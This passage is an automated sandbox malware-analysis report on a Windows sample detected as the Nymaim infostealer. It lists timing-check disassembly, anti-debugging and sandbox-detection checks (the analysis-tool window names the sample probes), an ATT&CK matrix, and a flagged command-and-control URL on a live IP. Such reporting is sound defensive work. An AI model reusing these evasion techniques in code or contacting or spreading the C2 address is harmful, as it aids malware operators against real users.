                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01669 second address: 4A0166F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0166F second address: 4A01673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01673 second address: 4A016F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+2Ch], ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 jmp 00007F7704DD53B8h 0x00000018 popad 0x00000019 mov ax, word ptr [esi+30h] 0x0000001d pushad 0x0000001e mov cx, 698Dh 0x00000022 mov si, 1189h 0x00000026 popad 0x00000027 mov word ptr [edx+30h], ax 0x0000002b jmp 00007F7704DD53B4h 0x00000030 mov ax, word ptr [esi+32h] 0x00000034 pushad 0x00000035 push ecx 0x00000036 mov eax, edi 0x00000038 pop edx 0x00000039 mov bl, ah 0x0000003b popad 0x0000003c mov word ptr [edx+32h], ax 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 push ecx 0x00000044 pop edi 0x00000045 mov ax, 7E95h 0x00000049 popad 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A016F2 second address: 4A01704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7704E143BEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01704 second address: 4A01767 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+34h] 0x0000000e pushad 0x0000000f mov al, 0Bh 0x00000011 pushad 0x00000012 mov cx, di 0x00000015 movsx edi, ax 0x00000018 popad 0x00000019 popad 0x0000001a mov dword ptr [edx+34h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F7704DD53B7h 0x00000026 add eax, 677DFB0Eh 0x0000002c jmp 00007F7704DD53B9h 0x00000031 popfd 0x00000032 mov si, 4017h 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01767 second address: 4A01798 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007F7704E143C3h 0x00000017 pop esi 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01798 second address: 4A01833 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F77751D330Dh 0x0000000f jmp 00007F7704DD53B0h 0x00000014 or dword ptr [edx+38h], FFFFFFFFh 0x00000018 jmp 00007F7704DD53B0h 0x0000001d or dword ptr [edx+3Ch], FFFFFFFFh 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F7704DD53AEh 0x00000028 and cl, FFFFFFA8h 0x0000002b jmp 00007F7704DD53ABh 0x00000030 popfd 0x00000031 jmp 00007F7704DD53B8h 0x00000036 popad 0x00000037 or dword ptr [edx+40h], FFFFFFFFh 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F7704DD53B7h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F012C second address: 49F0132 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0132 second address: 49F0141 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0141 second address: 49F0147 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0147 second address: 49F014D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F014D second address: 49F0184 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F7704E143BDh 0x00000014 and eax, 7022F6E6h 0x0000001a jmp 00007F7704E143C1h 0x0000001f popfd 0x00000020 mov ch, A5h 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0184 second address: 49F018A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F018A second address: 49F018E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F018E second address: 49F0192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0CC9 second address: 49D0CEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov ch, 06h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0CEC second address: 49D0CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0CF6 second address: 49D0D60 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7704E143C1h 0x00000008 and cl, FFFFFFA6h 0x0000000b jmp 00007F7704E143C1h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F7704E143C1h 0x0000001a xchg eax, ebp 0x0000001b jmp 00007F7704E143BEh 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 movzx ecx, bx 0x00000026 mov bh, 59h 0x00000028 popad 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F7704E143C1h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F01FC second address: 49F023C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], ebp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007F7704DD53AAh 0x00000016 xor si, 1C08h 0x0000001b jmp 00007F7704DD53ABh 0x00000020 popfd 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F023C second address: 49F026D instructions: 0x00000000 rdtsc 0x00000002 mov dh, al 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dx, 9738h 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d jmp 00007F7704E143C7h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 movsx edi, cx 0x00000019 mov eax, 41F502F3h 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F026D second address: 49F0273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0273 second address: 49F0277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106F7 second address: 4A1070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7704DD53B4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1070F second address: 4A10713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10713 second address: 4A10747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F7704DD53ACh 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F7704DD53B0h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d mov di, 523Eh 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10747 second address: 4A107B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 1831h 0x00000007 pushfd 0x00000008 jmp 00007F7704E143BEh 0x0000000d sbb cx, 7C08h 0x00000012 jmp 00007F7704E143BBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov ecx, edi 0x00000021 pushfd 0x00000022 jmp 00007F7704E143C7h 0x00000027 add esi, 11C66CFEh 0x0000002d jmp 00007F7704E143C9h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A107B0 second address: 4A107B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4739E5 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 473ABD instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4715EA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 63D888 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 61BE83 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6A8E8A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061BF57 rdtsc 0_2_0061BF57
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 733Jump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 798Jump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1077Jump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1044Jump to behavior
                Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.1 %
                Source: C:\Users\user\Desktop\file.exe TID: 7564Thread sleep count: 62 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7564Thread sleep time: -124062s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7524Thread sleep count: 175 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7524Thread sleep count: 170 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7524Thread sleep count: 196 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7524Thread sleep count: 186 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7540Thread sleep count: 733 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7540Thread sleep time: -1466733s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7524Thread sleep count: 139 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7524Thread sleep count: 217 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7524Thread sleep count: 183 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7524Thread sleep count: 202 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7524Thread sleep count: 101 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7560Thread sleep count: 798 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7560Thread sleep time: -1596798s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7552Thread sleep count: 1077 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7552Thread sleep time: -2155077s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7544Thread sleep count: 1044 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7544Thread sleep time: -2089044s >= -30000sJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: file.exe, file.exe, 00000000.00000002.4108755842.00000000005F6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.4109269730.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4109269730.0000000000BBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.4108755842.00000000005F6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Found potential dummy code loops (likely to delay analysis)
                Source: C:\Users\user\Desktop\file.exeProcess Stats: CPU usage > 42% for more than 60s
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061BF57 rdtsc 0_2_0061BF57
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040CDE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A50
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04797D41 push dword ptr fs:[00000030h]0_2_04797D41
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04940D90 mov eax, dword ptr fs:[00000030h]0_2_04940D90
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0494092B mov eax, dword ptr fs:[00000030h]0_2_0494092B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418592 GetProcessHeap,0_2_00418592
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409A2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00409A2A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040CDE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A58A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A58A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A720 SetUnhandledExceptionFilter,0_2_0040A720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04949C91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_04949C91
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0494A7F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0494A7F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0494D04A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0494D04A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0494A987 SetUnhandledExceptionFilter,0_2_0494A987
                Source: file.exe, file.exe, 00000000.00000002.4108755842.00000000005F6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 9,Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A2EC cpuid 0_2_0040A2EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00410822 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_00410822

                Stealing of Sensitive Information

                barindex
                Yara detected Nymaim
                Source: Yara matchFile source: 0.2.file.exe.4940e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.4a30000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1670201728.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		1
                Process Injection                		341
                Virtualization/Sandbox Evasion                		OS Credential Dumping1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Process Injection                		LSASS Memory771
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager341
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
                Obfuscated Files or Information                		NTDS3
                Process Discovery                		Distributed Component Object ModelInput Capture11
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets1
                Application Window Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials213
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe32%ReversingLabsWin32.Infostealer.Tinba
                file.exe44%VirustotalBrowse
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub#h100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubU&Fi100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubw5Tp$100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub;b100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub-b6100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub-100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubj%100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubN%Ch100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubSh100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubKc100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubKb100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub79-;c100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub#h3%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub-b6file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubU&Fifile.exe, 00000000.00000002.4109269730.0000000000BD0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubw5Tp$file.exe, 00000000.00000002.4109269730.0000000000BDB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub#hfile.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 3%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub;bfile.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub-file.exe, 00000000.00000002.4109269730.0000000000BD0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubj%file.exe, 00000000.00000002.4109269730.0000000000BD0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubN%Chfile.exe, 00000000.00000002.4109269730.0000000000BD0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubShfile.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubKcfile.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubKbfile.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubkbfile.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub79-;cfile.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    185.156.72.65
                    		unknownRussian Federation
                    		44636ITDELUXE-ASRUtrue

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1565613
                    Start date and time:2024-11-30 09:57:04 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 54s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
